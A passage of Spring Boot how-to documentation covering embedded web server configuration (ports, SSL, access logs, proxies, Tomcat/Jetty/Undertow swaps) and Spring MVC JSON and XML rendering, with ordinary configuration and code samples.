as an OS\nenvironment variable).\n\nTo switch off the HTTP endpoints completely, but still create a `WebApplicationContext`,\nuse `server.port=-1` (this is sometimes useful for testing).\n\nFor more details look at _<<spring-boot-features.adoc#boot-features-customizing-embedded-containers>>_\nin the '`Spring Boot features`' section, or the\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`] source\ncode.\n\n\n\n[[howto-user-a-random-unassigned-http-port]]\n=== Use a random unassigned HTTP port\nTo scan for a free port (using OS natives to prevent clashes) use `server.port=0`.\n\n\n\n[[howto-discover-the-http-port-at-runtime]]\n=== Discover the HTTP port at runtime\nYou can access the port the server is running on from log output or from the\n`EmbeddedWebApplicationContext` via its `EmbeddedServletContainer`. The best way to get\nthat and be sure that it has initialized is to add a `@Bean` of type\n`ApplicationListener<EmbeddedServletContainerInitializedEvent>` and pull the container\nout of the event when it is published.\n\nTests that use `@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)` can\nalso inject the actual port into a field using the `@LocalServerPort` annotation. For\nexample:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)\n\tpublic class MyWebIntegrationTests {\n\n\t\t@Autowired\n\t\tEmbeddedWebApplicationContext server;\n\n\t\t@LocalServerPort\n\t\tint port;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@LocalServerPort` is a meta-annotation for `@Value(\"${local.server.port}\")`. Don't try\nto inject the port in a regular application. As we just saw, the value is only set once\nthe container has initialized; contrary to a test, application code callbacks are\nprocessed early (i.e. before the value is actually available).\n====\n\n\n\n[[howto-configure-ssl]]\n=== Configure SSL\nSSL can be configured declaratively by setting the various `+server.ssl.*+` properties,\ntypically in `application.properties` or `application.yml`. For example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=8443\n\tserver.ssl.key-store=classpath:keystore.jks\n\tserver.ssl.key-store-password=secret\n\tserver.ssl.key-password=another-secret\n----\n\nSee {sc-spring-boot}\/context\/embedded\/Ssl.{sc-ext}[`Ssl`] for details of all of the\nsupported properties.\n\nUsing configuration like the example above means the application will no longer support\nplain HTTP connector at port 8080. Spring Boot doesn't support the configuration of both\nan HTTP connector and an HTTPS connector via `application.properties`. If you want to\nhave both then you'll need to configure one of them programmatically. It's recommended\nto use `application.properties` to configure HTTPS as the HTTP connector is the easier of\nthe two to configure programmatically. 
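As a minimal sketch (Tomcat assumed, port value illustrative), the plain HTTP connector\ncould be added programmatically like this, alongside the HTTPS connector configured via\n`application.properties`:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerFactory servletContainer() {\n\t\tTomcatEmbeddedServletContainerFactory tomcat = new TomcatEmbeddedServletContainerFactory();\n\t\t\/\/ The server.port and server.ssl.* properties still apply to this factory\n\t\tConnector connector = new Connector(\"org.apache.coyote.http11.Http11NioProtocol\");\n\t\tconnector.setPort(8080);\n\t\ttomcat.addAdditionalTomcatConnectors(connector);\n\t\treturn tomcat;\n\t}\n----\n\n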
See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-tomcat-multi-connectors[`spring-boot-sample-tomcat-multi-connectors`]\nsample project for an example.\n\n\n\n[[howto-configure-accesslogs]]\n=== Configure Access Logging\nAccess logs can be configured for Tomcat and Undertow via their respective namespaces.\n\nFor instance, the following logs access on Tomcat with a\nhttps:\/\/tomcat.apache.org\/tomcat-8.0-doc\/config\/valve.html#Access_Logging[custom pattern].\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.tomcat.basedir=my-tomcat\n\tserver.tomcat.accesslog.enabled=true\n\tserver.tomcat.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nNOTE: The default location for logs is a `logs` directory relative to the tomcat base dir\nand said directory is a temp directory by default so you may want to fix Tomcat's base\ndirectory or use an absolute path for the logs. In the example above, the logs will\nbe available in `my-tomcat\/logs` relative to the working directory of the application.\n\nAccess logging for undertow can be configured in a similar fashion\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.undertow.accesslog.enabled=true\n\tserver.undertow.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nLogs are stored in a `logs` directory relative to the working directory of the\napplication. This can be customized via `server.undertow.accesslog.directory`.\n\n\n\n[[howto-use-behind-a-proxy-server]]\n[[howto-use-tomcat-behind-a-proxy-server]]\n=== Use behind a front-end proxy server\nYour application might need to send `302` redirects or render content with absolute links\nback to itself. When running behind a proxy, the caller wants a link to the proxy, and not\nto the physical address of the machine hosting your app. Typically such situations are\nhandled via a contract with the proxy, which will add headers to tell the back end how to\nconstruct links to itself.\n\nIf the proxy adds conventional `X-Forwarded-For` and `X-Forwarded-Proto` headers (most do\nthis out of the box) the absolute links should be rendered correctly as long as\n`server.use-forward-headers` is set to `true` in your `application.properties`.\n\nNOTE: If your application is running in Cloud Foundry or Heroku the\n`server.use-forward-headers` property will default to `true` if not specified. In all\nother instances it defaults to `false`.\n\n\n\n[[howto-customize-tomcat-behind-a-proxy-server]]\n==== Customize Tomcat's proxy configuration\nIf you are using Tomcat you can additionally configure the names of the headers used to\ncarry \"`forwarded`\" information:\n\n[indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-your-remote-ip-header\n\tserver.tomcat.protocol-header=x-your-protocol-header\n----\n\nTomcat is also configured with a default regular expression that matches internal\nproxies that are to be trusted. By default, IP addresses in `10\/8`, `192.168\/16`,\n`169.254\/16` and `127\/8` are trusted. You can customize the valve's configuration by\nadding an entry to `application.properties`, e.g.\n\n[indent=0]\n----\n\tserver.tomcat.internal-proxies=192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\n----\n\nNOTE: The double backslashes are only required when you're using a properties file for\nconfiguration. 
If you are using YAML, single backslashes are sufficient and a value\nthat's equivalent to the one shown above would be `192\\.168\\.\\d{1,3}\\.\\d{1,3}`.\n\nNOTE: You can trust all proxies by setting the `internal-proxies` to empty (but don't do\nthis in production).\n\nYou can take complete control of the configuration of Tomcat's `RemoteIpValve` by\nswitching the automatic one off (i.e. set `server.use-forward-headers=false`) and adding\na new valve instance in a `TomcatEmbeddedServletContainerFactory` bean.\n\n\n\n[[howto-configure-tomcat]]\n=== Configure Tomcat\nGenerally you can follow the advice from\n_<<howto-discover-build-in-options-for-external-properties>>_ about\n`@ConfigurationProperties` (`ServerProperties` is the main one here), but also look at\n`EmbeddedServletContainerCustomizer` and various Tomcat-specific `+*Customizers+` that you\ncan add in one of those. The Tomcat APIs are quite rich so once you have access to the\n`TomcatEmbeddedServletContainerFactory` you can modify it in a number of ways. Or the\nnuclear option is to add your own `TomcatEmbeddedServletContainerFactory`.\n\n\n\n[[howto-enable-multiple-connectors-in-tomcat]]\n=== Enable Multiple Connectors with Tomcat\nAdd a `org.apache.catalina.connector.Connector` to the\n`TomcatEmbeddedServletContainerFactory` which can allow multiple connectors, e.g. HTTP and\nHTTPS connector:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerFactory servletContainer() {\n\t\tTomcatEmbeddedServletContainerFactory tomcat = new TomcatEmbeddedServletContainerFactory();\n\t\ttomcat.addAdditionalTomcatConnectors(createSslConnector());\n\t\treturn tomcat;\n\t}\n\n\tprivate Connector createSslConnector() {\n\t\tConnector connector = new Connector(\"org.apache.coyote.http11.Http11NioProtocol\");\n\t\tHttp11NioProtocol protocol = (Http11NioProtocol) connector.getProtocolHandler();\n\t\ttry {\n\t\t\tFile keystore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tFile truststore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tconnector.setScheme(\"https\");\n\t\t\tconnector.setSecure(true);\n\t\t\tconnector.setPort(8443);\n\t\t\tprotocol.setSSLEnabled(true);\n\t\t\tprotocol.setKeystoreFile(keystore.getAbsolutePath());\n\t\t\tprotocol.setKeystorePass(\"changeit\");\n\t\t\tprotocol.setTruststoreFile(truststore.getAbsolutePath());\n\t\t\tprotocol.setTruststorePass(\"changeit\");\n\t\t\tprotocol.setKeyAlias(\"apitester\");\n\t\t\treturn connector;\n\t\t}\n\t\tcatch (IOException ex) {\n\t\t\tthrow new IllegalStateException(\"can't access keystore: [\" + \"keystore\"\n\t\t\t\t\t+ \"] or truststore: [\" + \"keystore\" + \"]\", ex);\n\t\t}\n\t}\n----\n\n\n\n[[howto-use-tomcat-legacycookieprocessor]]\n=== Use Tomcat's LegacyCookieProcessor\nThe embedded Tomcat used by Spring Boot does not support \"Version 0\" of the Cookie\nformat out of the box, and you may see the following error:\n\n[indent=0]\n----\n\tjava.lang.IllegalArgumentException: An invalid character [32] was present in the Cookie value\n----\n\nIf at all possible, you should consider updating your code to only store values\ncompliant with later Cookie specifications. If, however, you're unable to change the\nway that cookies are written, you can instead configure Tomcat to use a\n`LegacyCookieProcessor`. 
To switch to the `LegacyCookieProcessor` use an\n`EmbeddedServletContainerCustomizer` bean that adds a `TomcatContextCustomizer`:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/embedded\/TomcatLegacyCookieProcessorExample.java[tag=customizer]\n----\n\n\n\n[[howto-use-jetty-instead-of-tomcat]]\n=== Use Jetty instead of Tomcat\nThe Spring Boot starters (`spring-boot-starter-web` in particular) use Tomcat as an\nembedded container by default. You need to exclude those dependencies and include the\nJetty one instead. Spring Boot provides Tomcat and Jetty dependencies bundled together\nas separate starters to help make this process as easy as possible.\n\nExample in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t<\/dependency>\n----\n\nExample in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\tcompile.exclude module: \"spring-boot-starter-tomcat\"\n\t}\n\n\tdependencies {\n\t\tcompile(\"org.springframework.boot:spring-boot-starter-web:{spring-boot-version}\")\n\t\tcompile(\"org.springframework.boot:spring-boot-starter-jetty:{spring-boot-version}\")\n\t\t\/\/ ...\n\t}\n----\n\n\n\n[[howto-configure-jetty]]\n=== Configure Jetty\nGenerally you can follow the advice from\n_<<howto-discover-build-in-options-for-external-properties>>_ about\n`@ConfigurationProperties` (`ServerProperties` is the main one here), but also look at\n`EmbeddedServletContainerCustomizer`. The Jetty APIs are quite rich so once you have\naccess to the `JettyEmbeddedServletContainerFactory` you can modify it in a number\nof ways. Or the nuclear option is to add your own `JettyEmbeddedServletContainerFactory`.\n\n\n\n[[howto-use-undertow-instead-of-tomcat]]\n=== Use Undertow instead of Tomcat\nUsing Undertow instead of Tomcat is very similar to <<howto-use-jetty-instead-of-tomcat,\nusing Jetty instead of Tomcat>>. 
You need to exclude the Tomcat dependencies and include\nthe Undertow starter instead.\n\nExample in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-undertow<\/artifactId>\n\t<\/dependency>\n----\n\nExample in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\tcompile.exclude module: \"spring-boot-starter-tomcat\"\n\t}\n\n\tdependencies {\n\t\tcompile(\"org.springframework.boot:spring-boot-starter-web:{spring-boot-version}\")\n\t\tcompile(\"org.springframework.boot:spring-boot-starter-undertow:{spring-boot-version}\")\n\t\t\/\/ ...\n\t}\n----\n\n\n\n[[howto-configure-undertow]]\n=== Configure Undertow\nGenerally you can follow the advice from\n_<<howto-discover-build-in-options-for-external-properties>>_ about\n`@ConfigurationProperties` (`ServerProperties` and `ServerProperties.Undertow` are the\nmain ones here), but also look at\n`EmbeddedServletContainerCustomizer`. Once you have access to the\n`UndertowEmbeddedServletContainerFactory` you can use an `UndertowBuilderCustomizer` to\nmodify Undertow's configuration to meet your needs. Or the nuclear option is to add your\nown `UndertowEmbeddedServletContainerFactory`.\n\n\n\n[[howto-enable-multiple-listeners-in-undertow]]\n=== Enable Multiple Listeners with Undertow\nAdd an `UndertowBuilderCustomizer` to the `UndertowEmbeddedServletContainerFactory` and\nadd a listener to the `Builder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic UndertowEmbeddedServletContainerFactory embeddedServletContainerFactory() {\n\t\tUndertowEmbeddedServletContainerFactory factory = new UndertowEmbeddedServletContainerFactory();\n\t\tfactory.addBuilderCustomizers(new UndertowBuilderCustomizer() {\n\n\t\t\t@Override\n\t\t\tpublic void customize(Builder builder) {\n\t\t\t\tbuilder.addHttpListener(8080, \"0.0.0.0\");\n\t\t\t}\n\n\t\t});\n\t\treturn factory;\n\t}\n----\n\n\n\n[[howto-use-tomcat-7]]\n=== Use Tomcat 7.x or 8.0\nTomcat 7 & 8.0 work with Spring Boot, but the default is to use Tomcat 8.5. If you cannot\nuse Tomcat 8.5 (for example, because you are using Java 1.6) you will need to change your\nclasspath to reference a different version.\n\n\n\n[[howto-use-tomcat-7-maven]]\n==== Use Tomcat 7.x or 8.0 with Maven\nIf you are using the starters and parent you can change the Tomcat version property\nand additionally import `tomcat-juli`. E.g. 
for a simple webapp or service:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<tomcat.version>7.0.59<\/tomcat.version>\n\t<\/properties>\n\t<dependencies>\n\t\t...\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<\/dependency>\n\t\t<dependency>\n\t\t\t<groupId>org.apache.tomcat<\/groupId>\n\t\t\t<artifactId>tomcat-juli<\/artifactId>\n\t\t\t<version>${tomcat.version}<\/version>\n\t\t<\/dependency>\n\t\t...\n\t<\/dependencies>\n----\n\n\n\n[[howto-use-tomcat-7-gradle]]\n==== Use Tomcat 7.x or 8.0 with Gradle\nWith Gradle, you can change the Tomcat version by setting the `tomcat.version` property\nand then additionally include `tomcat-juli`:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\text['tomcat.version'] = '7.0.59'\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-web'\n\t\tcompile group:'org.apache.tomcat', name:'tomcat-juli', version:property('tomcat.version')\n\t}\n----\n\n\n\n[[howto-use-jetty-9.2]]\n=== Use Jetty 9.2\nJetty 9.2 works with Spring Boot, but the default is to use Jetty 9.3. If you cannot use\nJetty 9.3 (for example, because you are using Java 7) you will need to change your\nclasspath to reference Jetty 9.2.\n\n\n\n[[howto-use-jetty-9.2-maven]]\n==== Use Jetty 9.2 with Maven\n\nIf you are using the starters and parent you can just add the Jetty starter and override\nthe `jetty.version` property:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<jetty.version>9.2.17.v20160517<\/jetty.version>\n\t<\/properties>\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t\t<exclusions>\n\t\t\t\t<exclusion>\n\t\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t\t<\/exclusion>\n\t\t\t<\/exclusions>\n\t\t<\/dependency>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t\t<\/dependency>\n\t<\/dependencies>\n----\n\n\n\n[[howto-use-jetty-9.2-gradle]]\n==== Use Jetty 9.2 with Gradle\n\nYou can set the `jetty.version` property. For example, for a simple webapp or service:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\text['jetty.version'] = '9.2.17.v20160517'\n\tdependencies {\n\t\tcompile ('org.springframework.boot:spring-boot-starter-web') {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-tomcat'\n\t\t}\n\t\tcompile ('org.springframework.boot:spring-boot-starter-jetty')\n\t}\n----\n\n\n\n[[howto-use-jetty-8]]\n=== Use Jetty 8\nJetty 8 works with Spring Boot, but the default is to use Jetty 9.3. If you cannot use\nJetty 9.3 (for example, because you are using Java 1.6) you will need to change your\nclasspath to reference Jetty 8. You will also need to exclude Jetty's WebSocket-related\ndependencies.\n\n\n\n[[howto-use-jetty-8-maven]]\n==== Use Jetty 8 with Maven\n\nIf you are using the starters and parent you can just add the Jetty starter with\nthe required WebSocket exclusion and change the version properties, e.g. 
for a simple\nwebapp or service:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<jetty.version>8.1.15.v20140411<\/jetty.version>\n\t\t<jetty-jsp.version>2.2.0.v201112011158<\/jetty-jsp.version>\n\t<\/properties>\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t\t<exclusions>\n\t\t\t\t<exclusion>\n\t\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t\t<\/exclusion>\n\t\t\t<\/exclusions>\n\t\t<\/dependency>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t\t\t<exclusions>\n\t\t\t\t<exclusion>\n\t\t\t\t\t<groupId>org.eclipse.jetty.websocket<\/groupId>\n\t\t\t\t\t<artifactId>*<\/artifactId>\n\t\t\t\t<\/exclusion>\n\t\t\t<\/exclusions>\n\t\t<\/dependency>\n\t<\/dependencies>\n----\n\n\n\n[[howto-use-jetty-8-gradle]]\n==== Use Jetty 8 with Gradle\n\nYou can set the `jetty.version` property and exclude the WebSocket dependency, e.g. for a\nsimple webapp or service:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\text['jetty.version'] = '8.1.15.v20140411'\n\tdependencies {\n\t\tcompile ('org.springframework.boot:spring-boot-starter-web') {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-tomcat'\n\t\t}\n\t\tcompile ('org.springframework.boot:spring-boot-starter-jetty') {\n\t\t\texclude group: 'org.eclipse.jetty.websocket'\n\t\t}\n\t}\n----\n\n\n\n[[howto-create-websocket-endpoints-using-serverendpoint]]\n=== Create WebSocket endpoints using @ServerEndpoint\nIf you want to use `@ServerEndpoint` in a Spring Boot application that uses an embedded\ncontainer, you must declare a single `ServerEndpointExporter` `@Bean`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServerEndpointExporter serverEndpointExporter() {\n\t\treturn new ServerEndpointExporter();\n\t}\n----\n\nThis bean will register any `@ServerEndpoint` annotated beans with the underlying\nWebSocket container. When deployed to a standalone servlet container this role is\nperformed by a servlet container initializer and the `ServerEndpointExporter` bean is\nnot required.\n\n\n\n[[how-to-enable-http-response-compression]]\n=== Enable HTTP response compression\nHTTP response compression is supported by Jetty, Tomcat, and Undertow. It can be enabled\nvia `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.compression.enabled=true\n----\n\nBy default, responses must be at least 2048 bytes in length for compression to be\nperformed. This can be configured using the `server.compression.min-response-size`\nproperty.\n\nBy default, responses will only be compressed if their content type is one of the\nfollowing:\n\n - `text\/html`\n - `text\/xml`\n - `text\/plain`\n - `text\/css`\n\nThis can be configured using the `server.compression.mime-types` property.\n\n\n\n[[howto-spring-mvc]]\n== Spring MVC\n\n\n\n[[howto-write-a-json-rest-service]]\n=== Write a JSON REST service\nAny Spring `@RestController` in a Spring Boot application should render JSON responses by\ndefault as long as Jackson2 is on the classpath. 
For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RestController\n\tpublic class MyController {\n\n\t\t@RequestMapping(\"\/thing\")\n\t\tpublic MyThing thing() {\n\t\t\t\treturn new MyThing();\n\t\t}\n\n\t}\n----\n\nAs long as `MyThing` can be serialized by Jackson2 (e.g. a normal POJO or Groovy object)\nthen `http:\/\/localhost:8080\/thing` will serve a JSON representation of it by default.\nSometimes in a browser you might see XML responses because browsers tend to send accept\nheaders that prefer XML.\n\n\n\n[[howto-write-an-xml-rest-service]]\n=== Write an XML REST service\nIf you have the Jackson XML extension (`jackson-dataformat-xml`) on the classpath, it will\nbe used to render XML responses and the very same example as we used for JSON would work.\nTo use it, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>com.fasterxml.jackson.dataformat<\/groupId>\n\t\t<artifactId>jackson-dataformat-xml<\/artifactId>\n\t<\/dependency>\n----\n\nYou may also want to add a dependency on Woodstox. It's faster than the default StAX\nimplementation provided by the JDK and also adds pretty print support and improved\nnamespace handling:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.codehaus.woodstox<\/groupId>\n\t\t<artifactId>woodstox-core-asl<\/artifactId>\n\t<\/dependency>\n----\n\nIf Jackson's XML extension is not available, JAXB (provided by default in the JDK) will\nbe used, with the additional requirement to have `MyThing` annotated as\n`@XmlRootElement`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@XmlRootElement\n\tpublic class MyThing {\n\t\tprivate String name;\n\t\t\/\/ .. getters and setters\n\t}\n----\n\nTo get the server to render XML instead of JSON you might have to send an\n`Accept: text\/xml` header (or use a browser).\n\n\n\n[[howto-customize-the-jackson-objectmapper]]\n=== Customize the Jackson ObjectMapper\nSpring MVC (client and server side) uses `HttpMessageConverters` to negotiate content\nconversion in an HTTP exchange. If Jackson is on the classpath you already get the\ndefault converter(s) provided by `Jackson2ObjectMapperBuilder`, an instance of which\nis auto-configured for you.\n\nThe `ObjectMapper` (or `XmlMapper` for Jackson XML converter) instance created by default\nhas the following customized properties:\n\n* `MapperFeature.DEFAULT_VIEW_INCLUSION` is disabled\n* `DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES` is disabled\n\nSpring Boot has also some features to make it easier to customize this behavior.\n\nYou can configure the `ObjectMapper` and `XmlMapper` instances using the environment.\nJackson provides an extensive suite of simple on\/off features that can be used to\nconfigure various aspects of its processing. 
These features are described in six enums in\nJackson which map onto properties in the environment:\n\n|===\n|Jackson enum|Environment property\n\n|`com.fasterxml.jackson.databind.DeserializationFeature`\n|`spring.jackson.deserialization.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.core.JsonGenerator.Feature`\n|`spring.jackson.generator.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.databind.MapperFeature`\n|`spring.jackson.mapper.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.core.JsonParser.Feature`\n|`spring.jackson.parser.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.databind.SerializationFeature`\n|`spring.jackson.serialization.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.annotation.JsonInclude.Include`\n|`spring.jackson.default-property-inclusion=always\\|non_null\\|non_absent\\|non_default\\|non_empty`\n|===\n\nFor example, to enable pretty print, set `spring.jackson.serialization.indent_output=true`.\nNote that, thanks to the use of <<boot-features-external-config-relaxed-binding,\nrelaxed binding>>, the case of `indent_output` doesn't have to match the case of the\ncorresponding enum constant which is `INDENT_OUTPUT`.\n\nThis environment-based configuration is applied to the auto-configured\n`Jackson2ObjectMapperBuilder` bean, and will apply to any mappers created\nusing the builder, including the auto-configured `ObjectMapper` bean.\n\nThe context's `Jackson2ObjectMapperBuilder` can be customized by one or more\n`Jackson2ObjectMapperBuilderCustomizer` beans. Such customizer beans can be ordered and\nBoot's own customizer has an order of 0, allowing additional customization to be applied\nboth before and after Boot's customization.\n\nAny beans of type `com.fasterxml.jackson.databind.Module` will be automatically registered\nwith the auto-configured `Jackson2ObjectMapperBuilder` and applied to any `ObjectMapper`\ninstances that it creates. This provides a global mechanism for contributing custom\nmodules when you add new features to your application.\n\nIf you want to replace the default `ObjectMapper` completely, either define a `@Bean` of\nthat type and mark it as `@Primary`, or, if you prefer the builder-based\napproach, define a `Jackson2ObjectMapperBuilder` `@Bean`. Note that in either case this\nwill disable all auto-configuration of the `ObjectMapper`.\n\nIf you provide any `@Beans` of type `MappingJackson2HttpMessageConverter` then\nthey will replace the default value in the MVC configuration. Also, a convenience bean is\nprovided of type `HttpMessageConverters` (always available if you use the default MVC\nconfiguration) which has some useful methods to access the default and user-enhanced\nmessage converters.\n\nSee also the _<<howto-customize-the-responsebody-rendering>>_ section and the\n{sc-spring-boot-autoconfigure}\/web\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-customize-the-responsebody-rendering]]\n=== Customize the @ResponseBody rendering\nSpring uses `HttpMessageConverters` to render `@ResponseBody` (or responses from\n`@RestController`). You can contribute additional converters by simply adding beans of\nthat type in a Spring Boot context. If a bean you add is of a type that would have been\nincluded by default anyway (like `MappingJackson2HttpMessageConverter` for JSON\nconversions) then it will replace the default value. 
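As an illustration, contributing an additional converter is just a matter of declaring a\n`@Bean`; the Gson-based converter below is purely an example (it requires Gson on the\nclasspath):\n\n[source,java,indent=0]\n----\n\t@Configuration\n\tpublic class MyConverterConfiguration {\n\n\t\t@Bean\n\t\tpublic GsonHttpMessageConverter gsonHttpMessageConverter() {\n\t\t\t\/\/ Picked up automatically and added to the converter list\n\t\t\treturn new GsonHttpMessageConverter();\n\t\t}\n\n\t}\n----\n\n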
A convenience bean is provided of\ntype `HttpMessageConverters` (always available if you use the default MVC configuration)\nwhich has some useful methods to access the default and user-enhanced message converters\n(useful, for example, if you want to manually inject them into a custom `RestTemplate`).\n\nAs in normal MVC usage, any `WebMvcConfigurerAdapter` beans that you provide can also\ncontribute converters by overriding the `configureMessageConverters` method, but unlike\nwith normal MVC, you can supply only additional converters that you need (because Spring\nBoot uses the same mechanism to contribute its defaults). Finally, if you opt-out of the\nSpring Boot default MVC configuration by providing your own `@EnableWebMvc` configuration,\nthen you can take control completely and do everything manually using\n`getMessageConverters` from `WebMvcConfigurationSupport`.\n\nSee the {sc-spring-boot-autoconfigure}\/web\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-multipart-file-upload-configuration]]\n=== Handling Multipart File Uploads\nSpring Boot embraces the Servlet 3 `javax.servlet.http.Part` API to support uploading\nfiles. By default, Spring Boot configures Spring MVC with a maximum size of 1MB per\nfile and a maximum of 10MB of file data in a single request. You may override these\nvalues, as well as the location to which intermediate data is stored (e.g., to the `\/tmp`\ndirectory) and the threshold past which data is flushed to disk by using the properties\nexposed in the `MultipartProperties` class. If you want to specify that file sizes are\nunlimited, for example, set the `spring.http.multipart.max-file-size` property to `-1`.\n\nThe multipart support is helpful when you want to receive multipart encoded file data as\na `@RequestParam`-annotated parameter of type `MultipartFile` in a Spring MVC controller\nhandler method.\n\nSee the {sc-spring-boot-autoconfigure}\/web\/MultipartAutoConfiguration.{sc-ext}[`MultipartAutoConfiguration`]\nsource for more details.\n\n\n\n[[howto-switch-off-the-spring-mvc-dispatcherservlet]]\n=== Switch off the Spring MVC DispatcherServlet\nSpring Boot wants to serve all content from the root of your application `\/` down. If you\nwould rather map your own servlet to that URL you can do it, but of course you may lose\nsome of the other Boot MVC features. To add your own servlet and map it to the root\nresource just declare a `@Bean` of type `Servlet` and give it the special bean name\n`dispatcherServlet` (you can also create a bean of a different type with that name if\nyou want to switch it off and not replace it).\n\n\n\n[[howto-switch-off-default-mvc-configuration]]\n=== Switch off the Default MVC configuration\nThe easiest way to take complete control over MVC configuration is to provide your own\n`@Configuration` with the `@EnableWebMvc` annotation. This will leave all MVC\nconfiguration in your hands.\n\n\n\n[[howto-customize-view-resolvers]]\n=== Customize ViewResolvers\nA `ViewResolver` is a core component of Spring MVC, translating view names in\n`@Controller` to actual `View` implementations. Note that `ViewResolvers` are mainly\nused in UI applications, rather than REST-style services (a `View` is not used to render\na `@ResponseBody`). There are many implementations of `ViewResolver` to choose from, and\nSpring on its own is not opinionated about which ones you should use. 
